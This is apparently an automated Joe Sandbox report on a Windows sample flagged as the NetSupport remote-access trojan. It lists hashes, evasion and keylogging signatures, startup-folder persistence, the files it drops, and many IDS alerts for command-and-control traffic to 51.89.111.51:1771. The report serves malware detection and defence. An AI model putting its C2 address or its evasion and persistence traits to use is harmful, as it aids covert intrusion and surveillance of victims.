Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
hkpqXovZtS.exe

Overview

General Information

Sample name:hkpqXovZtS.exe
renamed because original name is a hash value
Original sample name:197c2d218121ff0ec738f5d301bf13b7824320c07942b99c9f278e8d7508b15d.exe
Analysis ID:1546938
MD5:885a317f0e6471b48210a165fa878af7
SHA1:0beccc1ab4baa6ae9c9a735ecc0719b75031c394
SHA256:197c2d218121ff0ec738f5d301bf13b7824320c07942b99c9f278e8d7508b15d
Tags:exenetsupportuser-JAMESWT_MHT
Infos:

Detection

NetSupport RAT
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
AI detected suspicious sample
Checks if the current machine is a virtual machine (disk enumeration)
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Contains functionalty to change the wallpaper
Delayed program exit found
Machine Learning detection for sample
Query firmware table information (likely to detect VMs)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect virtualization through RDTSC time measurements
Uses known network protocols on non-standard ports
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to communicate with device drivers
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to detect virtual machines (SGDT)
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to record screenshots
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Enables security privileges
Extensive use of GetProcAddress (often used to hide API calls)
File is packed with WinRar
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evaded block containing many API calls
Found evasive API chain (date check)
Found evasive API chain checking for process token information
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Potential key logger detected (key state polling based)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: Startup Folder File Write
Stores files to the Windows start menu directory
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Yara detected Keylogger Generic
Yara detected NetSupport remote tool

Classification

  • System is w10x64
  • hkpqXovZtS.exe (PID: 6968 cmdline: "C:\Users\user\Desktop\hkpqXovZtS.exe" MD5: 885A317F0E6471B48210A165FA878AF7)
    • client32.exe (PID: 6276 cmdline: "C:\Users\user\AppData\Roaming\SuportUpWin\client32.exe" MD5: F76954B68CC390F8009F1A052283A740)
  • client32.exe (PID: 7496 cmdline: "C:\Users\user\AppData\Roaming\SuportUpWin\client32.exe" MD5: F76954B68CC390F8009F1A052283A740)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
C:\Users\user\AppData\Roaming\SuportUpWin\pcicapi.dllJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
    C:\Users\user\AppData\Roaming\SuportUpWin\client32.exeJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
      C:\Users\user\AppData\Roaming\SuportUpWin\PCICHEK.DLLJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
        C:\Users\user\AppData\Roaming\SuportUpWin\AudioCapture.dllJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
          C:\Users\user\AppData\Roaming\SuportUpWin\HTCTL32.DLLJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
            Click to see the 3 entries
            SourceRuleDescriptionAuthorStrings
            0000000B.00000000.1370270714.0000000000652000.00000002.00000001.01000000.00000007.sdmpJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
              00000003.00000002.3711137674.000000006E8F0000.00000002.00000001.01000000.0000000C.sdmpJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
                00000003.00000002.3710626041.0000000011194000.00000002.00000001.01000000.00000008.sdmpJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
                  00000003.00000002.3710626041.0000000011194000.00000002.00000001.01000000.00000008.sdmpJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
                    0000000B.00000002.1372118588.00000000111E2000.00000004.00000001.01000000.00000008.sdmpJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
                      Click to see the 18 entries
                      SourceRuleDescriptionAuthorStrings
                      3.0.client32.exe.650000.0.unpackJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
                        11.0.client32.exe.650000.0.unpackJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
                          11.2.client32.exe.650000.0.unpackJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
                            3.2.client32.exe.70220000.5.unpackJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
                              3.2.client32.exe.650000.0.unpackJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
                                Click to see the 14 entries
                                Source: File createdAuthor: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: EventID: 11, Image: C:\Users\user\Desktop\hkpqXovZtS.exe, ProcessId: 6968, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup
                                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                                2024-11-01T18:11:20.661224+010020229301A Network Trojan was detected52.149.20.212443192.168.2.749728TCP
                                2024-11-01T18:11:58.977593+010020229301A Network Trojan was detected52.149.20.212443192.168.2.749939TCP
                                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                                2024-11-01T18:11:14.216055+010020358941A Network Trojan was detected192.168.2.74970051.89.111.51771TCP
                                2024-11-01T18:12:07.565835+010020358941A Network Trojan was detected192.168.2.74996551.89.111.51771TCP
                                2024-11-01T18:12:46.984057+010020358941A Network Trojan was detected192.168.2.74997451.89.111.51771TCP
                                2024-11-01T18:13:26.320009+010020358941A Network Trojan was detected192.168.2.74997551.89.111.51771TCP
                                2024-11-01T18:14:05.559579+010020358941A Network Trojan was detected192.168.2.74997651.89.111.51771TCP
                                2024-11-01T18:14:44.518406+010020358941A Network Trojan was detected192.168.2.74997751.89.111.51771TCP
                                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                                2024-11-01T18:10:56.289168+010028277451Malware Command and Control Activity Detected192.168.2.74997751.89.111.51771TCP
                                2024-11-01T18:10:56.289168+010028277451Malware Command and Control Activity Detected192.168.2.74997751.89.111.51771TCP
                                2024-11-01T18:10:56.289168+010028277451Malware Command and Control Activity Detected192.168.2.74997751.89.111.51771TCP
                                2024-11-01T18:10:56.289168+010028277451Malware Command and Control Activity Detected192.168.2.74997751.89.111.51771TCP
                                2024-11-01T18:10:56.289168+010028277451Malware Command and Control Activity Detected192.168.2.74997751.89.111.51771TCP
                                2024-11-01T18:10:56.289168+010028277451Malware Command and Control Activity Detected192.168.2.74997751.89.111.51771TCP
                                2024-11-01T18:11:10.929682+010028277451Malware Command and Control Activity Detected192.168.2.74970051.89.111.51771TCP
                                2024-11-01T18:11:14.216055+010028277451Malware Command and Control Activity Detected192.168.2.74970051.89.111.51771TCP
                                2024-11-01T18:12:07.062631+010028277451Malware Command and Control Activity Detected192.168.2.74996551.89.111.51771TCP
                                2024-11-01T18:12:07.565835+010028277451Malware Command and Control Activity Detected192.168.2.74996551.89.111.51771TCP
                                2024-11-01T18:12:07.767876+010028277451Malware Command and Control Activity Detected192.168.2.74996551.89.111.51771TCP
                                2024-11-01T18:12:07.767876+010028277451Malware Command and Control Activity Detected192.168.2.74996551.89.111.51771TCP
                                2024-11-01T18:12:07.867640+010028277451Malware Command and Control Activity Detected192.168.2.74996551.89.111.51771TCP
                                2024-11-01T18:12:07.968070+010028277451Malware Command and Control Activity Detected192.168.2.74996551.89.111.51771TCP
                                2024-11-01T18:12:08.068759+010028277451Malware Command and Control Activity Detected192.168.2.74996551.89.111.51771TCP
                                2024-11-01T18:12:08.169633+010028277451Malware Command and Control Activity Detected192.168.2.74996551.89.111.51771TCP
                                2024-11-01T18:12:08.270929+010028277451Malware Command and Control Activity Detected192.168.2.74996551.89.111.51771TCP
                                2024-11-01T18:12:08.370931+010028277451Malware Command and Control Activity Detected192.168.2.74996551.89.111.51771TCP
                                2024-11-01T18:12:08.471610+010028277451Malware Command and Control Activity Detected192.168.2.74996551.89.111.51771TCP
                                2024-11-01T18:12:08.572648+010028277451Malware Command and Control Activity Detected192.168.2.74996551.89.111.51771TCP
                                2024-11-01T18:12:08.673635+010028277451Malware Command and Control Activity Detected192.168.2.74996551.89.111.51771TCP
                                2024-11-01T18:12:08.774613+010028277451Malware Command and Control Activity Detected192.168.2.74996551.89.111.51771TCP
                                2024-11-01T18:12:08.874878+010028277451Malware Command and Control Activity Detected192.168.2.74996551.89.111.51771TCP
                                2024-11-01T18:12:08.974635+010028277451Malware Command and Control Activity Detected192.168.2.74996551.89.111.51771TCP
                                2024-11-01T18:12:09.075635+010028277451Malware Command and Control Activity Detected192.168.2.74996551.89.111.51771TCP
                                2024-11-01T18:12:09.176647+010028277451Malware Command and Control Activity Detected192.168.2.74996551.89.111.51771TCP
                                2024-11-01T18:12:09.281072+010028277451Malware Command and Control Activity Detected192.168.2.74996551.89.111.51771TCP
                                2024-11-01T18:12:09.381700+010028277451Malware Command and Control Activity Detected192.168.2.74996551.89.111.51771TCP
                                2024-11-01T18:12:09.482636+010028277451Malware Command and Control Activity Detected192.168.2.74996551.89.111.51771TCP
                                2024-11-01T18:12:09.583617+010028277451Malware Command and Control Activity Detected192.168.2.74996551.89.111.51771TCP
                                2024-11-01T18:12:09.684640+010028277451Malware Command and Control Activity Detected192.168.2.74996551.89.111.51771TCP
                                2024-11-01T18:12:09.884648+010028277451Malware Command and Control Activity Detected192.168.2.74996551.89.111.51771TCP
                                2024-11-01T18:12:09.884648+010028277451Malware Command and Control Activity Detected192.168.2.74996551.89.111.51771TCP
                                2024-11-01T18:12:09.984805+010028277451Malware Command and Control Activity Detected192.168.2.74996551.89.111.51771TCP
                                2024-11-01T18:12:10.085640+010028277451Malware Command and Control Activity Detected192.168.2.74996551.89.111.51771TCP
                                2024-11-01T18:12:10.185730+010028277451Malware Command and Control Activity Detected192.168.2.74996551.89.111.51771TCP
                                2024-11-01T18:12:10.286663+010028277451Malware Command and Control Activity Detected192.168.2.74996551.89.111.51771TCP
                                2024-11-01T18:12:10.387662+010028277451Malware Command and Control Activity Detected192.168.2.74996551.89.111.51771TCP
                                2024-11-01T18:12:10.488637+010028277451Malware Command and Control Activity Detected192.168.2.74996551.89.111.51771TCP
                                2024-11-01T18:12:10.503174+010028277451Malware Command and Control Activity Detected192.168.2.74996551.89.111.51771TCP
                                2024-11-01T18:12:46.884070+010028277451Malware Command and Control Activity Detected192.168.2.74997451.89.111.51771TCP
                                2024-11-01T18:12:46.984057+010028277451Malware Command and Control Activity Detected192.168.2.74997451.89.111.51771TCP
                                2024-11-01T18:12:47.084059+010028277451Malware Command and Control Activity Detected192.168.2.74997451.89.111.51771TCP
                                2024-11-01T18:12:47.181870+010028277451Malware Command and Control Activity Detected192.168.2.74997451.89.111.51771TCP
                                2024-11-01T18:12:47.284069+010028277451Malware Command and Control Activity Detected192.168.2.74997451.89.111.51771TCP
                                2024-11-01T18:12:47.382839+010028277451Malware Command and Control Activity Detected192.168.2.74997451.89.111.51771TCP
                                2024-11-01T18:12:47.484065+010028277451Malware Command and Control Activity Detected192.168.2.74997451.89.111.51771TCP
                                2024-11-01T18:12:47.583844+010028277451Malware Command and Control Activity Detected192.168.2.74997451.89.111.51771TCP
                                2024-11-01T18:12:47.683820+010028277451Malware Command and Control Activity Detected192.168.2.74997451.89.111.51771TCP
                                2024-11-01T18:12:47.784828+010028277451Malware Command and Control Activity Detected192.168.2.74997451.89.111.51771TCP
                                2024-11-01T18:12:47.884865+010028277451Malware Command and Control Activity Detected192.168.2.74997451.89.111.51771TCP
                                2024-11-01T18:12:47.986231+010028277451Malware Command and Control Activity Detected192.168.2.74997451.89.111.51771TCP
                                2024-11-01T18:12:48.086827+010028277451Malware Command and Control Activity Detected192.168.2.74997451.89.111.51771TCP
                                2024-11-01T18:12:48.186857+010028277451Malware Command and Control Activity Detected192.168.2.74997451.89.111.51771TCP
                                2024-11-01T18:12:48.287546+010028277451Malware Command and Control Activity Detected192.168.2.74997451.89.111.51771TCP
                                2024-11-01T18:12:48.438872+010028277451Malware Command and Control Activity Detected192.168.2.74997451.89.111.51771TCP
                                2024-11-01T18:12:48.644080+010028277451Malware Command and Control Activity Detected192.168.2.74997451.89.111.51771TCP
                                2024-11-01T18:12:48.748062+010028277451Malware Command and Control Activity Detected192.168.2.74997451.89.111.51771TCP
                                2024-11-01T18:12:48.848055+010028277451Malware Command and Control Activity Detected192.168.2.74997451.89.111.51771TCP
                                2024-11-01T18:12:48.946839+010028277451Malware Command and Control Activity Detected192.168.2.74997451.89.111.51771TCP
                                2024-11-01T18:12:49.048062+010028277451Malware Command and Control Activity Detected192.168.2.74997451.89.111.51771TCP
                                2024-11-01T18:12:49.147854+010028277451Malware Command and Control Activity Detected192.168.2.74997451.89.111.51771TCP
                                2024-11-01T18:12:49.247879+010028277451Malware Command and Control Activity Detected192.168.2.74997451.89.111.51771TCP
                                2024-11-01T18:12:49.348827+010028277451Malware Command and Control Activity Detected192.168.2.74997451.89.111.51771TCP
                                2024-11-01T18:12:49.452077+010028277451Malware Command and Control Activity Detected192.168.2.74997451.89.111.51771TCP
                                2024-11-01T18:12:49.552058+010028277451Malware Command and Control Activity Detected192.168.2.74997451.89.111.51771TCP
                                2024-11-01T18:12:49.649971+010028277451Malware Command and Control Activity Detected192.168.2.74997451.89.111.51771TCP
                                2024-11-01T18:12:49.750839+010028277451Malware Command and Control Activity Detected192.168.2.74997451.89.111.51771TCP
                                2024-11-01T18:12:49.850879+010028277451Malware Command and Control Activity Detected192.168.2.74997451.89.111.51771TCP
                                2024-11-01T18:12:49.950876+010028277451Malware Command and Control Activity Detected192.168.2.74997451.89.111.51771TCP
                                2024-11-01T18:12:50.051860+010028277451Malware Command and Control Activity Detected192.168.2.74997451.89.111.51771TCP
                                2024-11-01T18:12:50.152877+010028277451Malware Command and Control Activity Detected192.168.2.74997451.89.111.51771TCP
                                2024-11-01T18:12:50.252845+010028277451Malware Command and Control Activity Detected192.168.2.74997451.89.111.51771TCP
                                2024-11-01T18:12:50.312288+010028277451Malware Command and Control Activity Detected192.168.2.74997451.89.111.51771TCP
                                2024-11-01T18:13:26.220183+010028277451Malware Command and Control Activity Detected192.168.2.74997551.89.111.51771TCP
                                2024-11-01T18:13:26.320009+010028277451Malware Command and Control Activity Detected192.168.2.74997551.89.111.51771TCP
                                2024-11-01T18:13:26.420967+010028277451Malware Command and Control Activity Detected192.168.2.74997551.89.111.51771TCP
                                2024-11-01T18:13:26.722291+010028277451Malware Command and Control Activity Detected192.168.2.74997551.89.111.51771TCP
                                2024-11-01T18:13:26.722291+010028277451Malware Command and Control Activity Detected192.168.2.74997551.89.111.51771TCP
                                2024-11-01T18:13:26.722291+010028277451Malware Command and Control Activity Detected192.168.2.74997551.89.111.51771TCP
                                2024-11-01T18:13:26.822995+010028277451Malware Command and Control Activity Detected192.168.2.74997551.89.111.51771TCP
                                2024-11-01T18:13:26.923019+010028277451Malware Command and Control Activity Detected192.168.2.74997551.89.111.51771TCP
                                2024-11-01T18:13:27.026395+010028277451Malware Command and Control Activity Detected192.168.2.74997551.89.111.51771TCP
                                2024-11-01T18:13:27.126444+010028277451Malware Command and Control Activity Detected192.168.2.74997551.89.111.51771TCP
                                2024-11-01T18:13:27.228177+010028277451Malware Command and Control Activity Detected192.168.2.74997551.89.111.51771TCP
                                2024-11-01T18:13:27.325031+010028277451Malware Command and Control Activity Detected192.168.2.74997551.89.111.51771TCP
                                2024-11-01T18:13:27.427469+010028277451Malware Command and Control Activity Detected192.168.2.74997551.89.111.51771TCP
                                2024-11-01T18:13:27.526014+010028277451Malware Command and Control Activity Detected192.168.2.74997551.89.111.51771TCP
                                2024-11-01T18:13:27.627710+010028277451Malware Command and Control Activity Detected192.168.2.74997551.89.111.51771TCP
                                2024-11-01T18:13:27.727121+010028277451Malware Command and Control Activity Detected192.168.2.74997551.89.111.51771TCP
                                2024-11-01T18:13:27.827020+010028277451Malware Command and Control Activity Detected192.168.2.74997551.89.111.51771TCP
                                2024-11-01T18:13:27.928113+010028277451Malware Command and Control Activity Detected192.168.2.74997551.89.111.51771TCP
                                2024-11-01T18:13:28.028118+010028277451Malware Command and Control Activity Detected192.168.2.74997551.89.111.51771TCP
                                2024-11-01T18:13:28.128063+010028277451Malware Command and Control Activity Detected192.168.2.74997551.89.111.51771TCP
                                2024-11-01T18:13:28.229211+010028277451Malware Command and Control Activity Detected192.168.2.74997551.89.111.51771TCP
                                2024-11-01T18:13:28.329231+010028277451Malware Command and Control Activity Detected192.168.2.74997551.89.111.51771TCP
                                2024-11-01T18:13:28.430009+010028277451Malware Command and Control Activity Detected192.168.2.74997551.89.111.51771TCP
                                2024-11-01T18:13:28.531013+010028277451Malware Command and Control Activity Detected192.168.2.74997551.89.111.51771TCP
                                2024-11-01T18:13:28.631998+010028277451Malware Command and Control Activity Detected192.168.2.74997551.89.111.51771TCP
                                2024-11-01T18:13:28.936158+010028277451Malware Command and Control Activity Detected192.168.2.74997551.89.111.51771TCP
                                2024-11-01T18:13:28.936158+010028277451Malware Command and Control Activity Detected192.168.2.74997551.89.111.51771TCP
                                2024-11-01T18:13:28.936158+010028277451Malware Command and Control Activity Detected192.168.2.74997551.89.111.51771TCP
                                2024-11-01T18:13:29.033039+010028277451Malware Command and Control Activity Detected192.168.2.74997551.89.111.51771TCP
                                2024-11-01T18:13:29.136151+010028277451Malware Command and Control Activity Detected192.168.2.74997551.89.111.51771TCP
                                2024-11-01T18:13:29.235748+010028277451Malware Command and Control Activity Detected192.168.2.74997551.89.111.51771TCP
                                2024-11-01T18:13:29.336150+010028277451Malware Command and Control Activity Detected192.168.2.74997551.89.111.51771TCP
                                2024-11-01T18:13:29.436163+010028277451Malware Command and Control Activity Detected192.168.2.74997551.89.111.51771TCP
                                2024-11-01T18:13:29.537658+010028277451Malware Command and Control Activity Detected192.168.2.74997551.89.111.51771TCP
                                2024-11-01T18:13:29.637008+010028277451Malware Command and Control Activity Detected192.168.2.74997551.89.111.51771TCP
                                2024-11-01T18:13:29.652239+010028277451Malware Command and Control Activity Detected192.168.2.74997551.89.111.51771TCP
                                2024-11-01T18:14:05.454813+010028277451Malware Command and Control Activity Detected192.168.2.74997651.89.111.51771TCP
                                2024-11-01T18:14:05.559579+010028277451Malware Command and Control Activity Detected192.168.2.74997651.89.111.51771TCP
                                2024-11-01T18:14:05.660267+010028277451Malware Command and Control Activity Detected192.168.2.74997651.89.111.51771TCP
                                2024-11-01T18:14:05.764251+010028277451Malware Command and Control Activity Detected192.168.2.74997651.89.111.51771TCP
                                2024-11-01T18:14:05.861252+010028277451Malware Command and Control Activity Detected192.168.2.74997651.89.111.51771TCP
                                2024-11-01T18:14:05.961321+010028277451Malware Command and Control Activity Detected192.168.2.74997651.89.111.51771TCP
                                2024-11-01T18:14:06.062231+010028277451Malware Command and Control Activity Detected192.168.2.74997651.89.111.51771TCP
                                2024-11-01T18:14:06.163278+010028277451Malware Command and Control Activity Detected192.168.2.74997651.89.111.51771TCP
                                2024-11-01T18:14:06.264304+010028277451Malware Command and Control Activity Detected192.168.2.74997651.89.111.51771TCP
                                2024-11-01T18:14:06.364287+010028277451Malware Command and Control Activity Detected192.168.2.74997651.89.111.51771TCP
                                2024-11-01T18:14:06.465251+010028277451Malware Command and Control Activity Detected192.168.2.74997651.89.111.51771TCP
                                2024-11-01T18:14:06.566242+010028277451Malware Command and Control Activity Detected192.168.2.74997651.89.111.51771TCP
                                2024-11-01T18:14:06.667351+010028277451Malware Command and Control Activity Detected192.168.2.74997651.89.111.51771TCP
                                2024-11-01T18:14:06.767239+010028277451Malware Command and Control Activity Detected192.168.2.74997651.89.111.51771TCP
                                2024-11-01T18:14:06.868263+010028277451Malware Command and Control Activity Detected192.168.2.74997651.89.111.51771TCP
                                2024-11-01T18:14:06.968458+010028277451Malware Command and Control Activity Detected192.168.2.74997651.89.111.51771TCP
                                2024-11-01T18:14:07.068252+010028277451Malware Command and Control Activity Detected192.168.2.74997651.89.111.51771TCP
                                2024-11-01T18:14:07.169225+010028277451Malware Command and Control Activity Detected192.168.2.74997651.89.111.51771TCP
                                2024-11-01T18:14:07.270236+010028277451Malware Command and Control Activity Detected192.168.2.74997651.89.111.51771TCP
                                2024-11-01T18:14:07.370240+010028277451Malware Command and Control Activity Detected192.168.2.74997651.89.111.51771TCP
                                2024-11-01T18:14:07.470239+010028277451Malware Command and Control Activity Detected192.168.2.74997651.89.111.51771TCP
                                2024-11-01T18:14:07.570283+010028277451Malware Command and Control Activity Detected192.168.2.74997651.89.111.51771TCP
                                2024-11-01T18:14:07.674268+010028277451Malware Command and Control Activity Detected192.168.2.74997651.89.111.51771TCP
                                2024-11-01T18:14:07.771244+010028277451Malware Command and Control Activity Detected192.168.2.74997651.89.111.51771TCP
                                2024-11-01T18:14:07.871288+010028277451Malware Command and Control Activity Detected192.168.2.74997651.89.111.51771TCP
                                2024-11-01T18:14:07.971332+010028277451Malware Command and Control Activity Detected192.168.2.74997651.89.111.51771TCP
                                2024-11-01T18:14:08.071359+010028277451Malware Command and Control Activity Detected192.168.2.74997651.89.111.51771TCP
                                2024-11-01T18:14:08.172242+010028277451Malware Command and Control Activity Detected192.168.2.74997651.89.111.51771TCP
                                2024-11-01T18:14:08.272273+010028277451Malware Command and Control Activity Detected192.168.2.74997651.89.111.51771TCP
                                2024-11-01T18:14:08.373272+010028277451Malware Command and Control Activity Detected192.168.2.74997651.89.111.51771TCP
                                2024-11-01T18:14:08.473338+010028277451Malware Command and Control Activity Detected192.168.2.74997651.89.111.51771TCP
                                2024-11-01T18:14:08.574238+010028277451Malware Command and Control Activity Detected192.168.2.74997651.89.111.51771TCP
                                2024-11-01T18:14:08.674247+010028277451Malware Command and Control Activity Detected192.168.2.74997651.89.111.51771TCP
                                2024-11-01T18:14:08.774347+010028277451Malware Command and Control Activity Detected192.168.2.74997651.89.111.51771TCP
                                2024-11-01T18:14:08.850668+010028277451Malware Command and Control Activity Detected192.168.2.74997651.89.111.51771TCP
                                2024-11-01T18:14:44.417389+010028277451Malware Command and Control Activity Detected192.168.2.74997751.89.111.51771TCP
                                2024-11-01T18:14:44.518406+010028277451Malware Command and Control Activity Detected192.168.2.74997751.89.111.51771TCP
                                2024-11-01T18:14:44.618662+010028277451Malware Command and Control Activity Detected192.168.2.74997751.89.111.51771TCP
                                2024-11-01T18:14:44.719432+010028277451Malware Command and Control Activity Detected192.168.2.74997751.89.111.51771TCP
                                2024-11-01T18:14:44.820115+010028277451Malware Command and Control Activity Detected192.168.2.74997751.89.111.51771TCP
                                2024-11-01T18:14:44.920350+010028277451Malware Command and Control Activity Detected192.168.2.74997751.89.111.51771TCP
                                2024-11-01T18:14:45.022902+010028277451Malware Command and Control Activity Detected192.168.2.74997751.89.111.51771TCP
                                2024-11-01T18:14:45.121438+010028277451Malware Command and Control Activity Detected192.168.2.74997751.89.111.51771TCP
                                2024-11-01T18:14:45.222671+010028277451Malware Command and Control Activity Detected192.168.2.74997751.89.111.51771TCP
                                2024-11-01T18:14:45.322478+010028277451Malware Command and Control Activity Detected192.168.2.74997751.89.111.51771TCP
                                2024-11-01T18:14:45.422523+010028277451Malware Command and Control Activity Detected192.168.2.74997751.89.111.51771TCP
                                2024-11-01T18:14:45.526509+010028277451Malware Command and Control Activity Detected192.168.2.74997751.89.111.51771TCP
                                2024-11-01T18:14:45.624412+010028277451Malware Command and Control Activity Detected192.168.2.74997751.89.111.51771TCP
                                2024-11-01T18:14:45.728344+010028277451Malware Command and Control Activity Detected192.168.2.74997751.89.111.51771TCP
                                2024-11-01T18:14:45.824935+010028277451Malware Command and Control Activity Detected192.168.2.74997751.89.111.51771TCP
                                2024-11-01T18:14:45.925430+010028277451Malware Command and Control Activity Detected192.168.2.74997751.89.111.51771TCP
                                2024-11-01T18:14:46.025465+010028277451Malware Command and Control Activity Detected192.168.2.74997751.89.111.51771TCP
                                2024-11-01T18:14:46.125490+010028277451Malware Command and Control Activity Detected192.168.2.74997751.89.111.51771TCP
                                2024-11-01T18:14:46.326521+010028277451Malware Command and Control Activity Detected192.168.2.74997751.89.111.51771TCP
                                2024-11-01T18:14:46.686446+010028277451Malware Command and Control Activity Detected192.168.2.74997751.89.111.51771TCP
                                2024-11-01T18:14:46.786424+010028277451Malware Command and Control Activity Detected192.168.2.74997751.89.111.51771TCP
                                2024-11-01T18:14:46.886471+010028277451Malware Command and Control Activity Detected192.168.2.74997751.89.111.51771TCP
                                2024-11-01T18:14:46.988359+010028277451Malware Command and Control Activity Detected192.168.2.74997751.89.111.51771TCP
                                2024-11-01T18:14:47.088463+010028277451Malware Command and Control Activity Detected192.168.2.74997751.89.111.51771TCP
                                2024-11-01T18:14:47.189429+010028277451Malware Command and Control Activity Detected192.168.2.74997751.89.111.51771TCP
                                2024-11-01T18:14:47.290442+010028277451Malware Command and Control Activity Detected192.168.2.74997751.89.111.51771TCP

                                Click to jump to signature section

                                Show All Signature Results

                                AV Detection

                                barindex
                                Source: hkpqXovZtS.exeAvira: detected
                                Source: C:\Users\user\AppData\Roaming\SuportUpWin\HTCTL32.DLLReversingLabs: Detection: 13%
                                Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exeReversingLabs: Detection: 29%
                                Source: C:\Users\user\AppData\Roaming\SuportUpWin\remcmdstub.exeReversingLabs: Detection: 23%
                                Source: hkpqXovZtS.exeReversingLabs: Detection: 52%
                                Source: Submited SampleIntegrated Neural Analysis Model: Matched 98.3% probability
                                Source: hkpqXovZtS.exeJoe Sandbox ML: detected
                                Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exeCode function: 3_2_110ADA40 GetModuleHandleA,GetProcAddress,GetProcAddress,GetLastError,wsprintfA,GetLastError,_memset,CryptGetProvParam,CryptGetProvParam,GetLastError,_memset,CryptGetProvParam,GetLastError,GetLastError,GetLastError,GetLastError,_malloc,GetLastError,_free,GetLastError,CryptReleaseContext,SetLastError,FreeLibrary,3_2_110ADA40
                                Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exeCode function: 11_2_110ADA40 GetModuleHandleA,GetProcAddress,GetProcAddress,GetLastError,wsprintfA,GetLastError,_memset,CryptGetProvParam,CryptGetProvParam,GetLastError,_memset,CryptGetProvParam,GetLastError,GetLastError,GetLastError,GetLastError,_malloc,GetLastError,_free,GetLastError,CryptReleaseContext,SetLastError,FreeLibrary,11_2_110ADA40
                                Source: hkpqXovZtS.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                                Source: C:\Users\user\Desktop\hkpqXovZtS.exeFile opened: C:\Users\user\AppData\Roaming\SuportUpWin\msvcr100.dllJump to behavior
                                Source: Binary string: msvcr100.i386.pdb source: client32.exe, client32.exe, 0000000B.00000002.1372400954.000000006CEE1000.00000020.00000001.01000000.0000000A.sdmp, msvcr100.dll.0.dr
                                Source: Binary string: E:\nsmsrc\nsm\1210\1210f\client32\Release\PCICL32.pdb source: hkpqXovZtS.exe, 00000000.00000003.1261181102.00000000066FF000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000003.00000002.3710626041.0000000011194000.00000002.00000001.01000000.00000008.sdmp, client32.exe, 0000000B.00000002.1372082359.0000000011194000.00000002.00000001.01000000.00000008.sdmp, PCICL32.DLL.0.dr
                                Source: Binary string: E:\nsmsrc\nsm\1210\1210f\ctl32\release\htctl32.pdbL source: client32.exe, 00000003.00000002.3711137674.000000006E8F0000.00000002.00000001.01000000.0000000C.sdmp, HTCTL32.DLL.0.dr
                                Source: Binary string: E:\nsmsrc\nsm\1210\1210\AudioCapture\Release\AudioCapture.pdb source: AudioCapture.dll.0.dr
                                Source: Binary string: d:\Projects\WinRAR\SFX\build\sfxrar32\Release\sfxrar.pdb source: hkpqXovZtS.exe
                                Source: Binary string: E:\nsmsrc\nsm\1210\1210f\ctl32\release\tcctl32.pdb source: hkpqXovZtS.exe, 00000000.00000003.1261181102.0000000006571000.00000004.00000020.00020000.00000000.sdmp, TCCTL32.DLL.0.dr
                                Source: Binary string: E:\nsmsrc\nsm\1210\1210f\ctl32\Full\pcichek.pdb source: client32.exe, 00000003.00000002.3711306367.0000000070222000.00000002.00000001.01000000.0000000B.sdmp, client32.exe, 0000000B.00000002.1372539158.0000000070222000.00000002.00000001.01000000.0000000B.sdmp, PCICHEK.DLL.0.dr
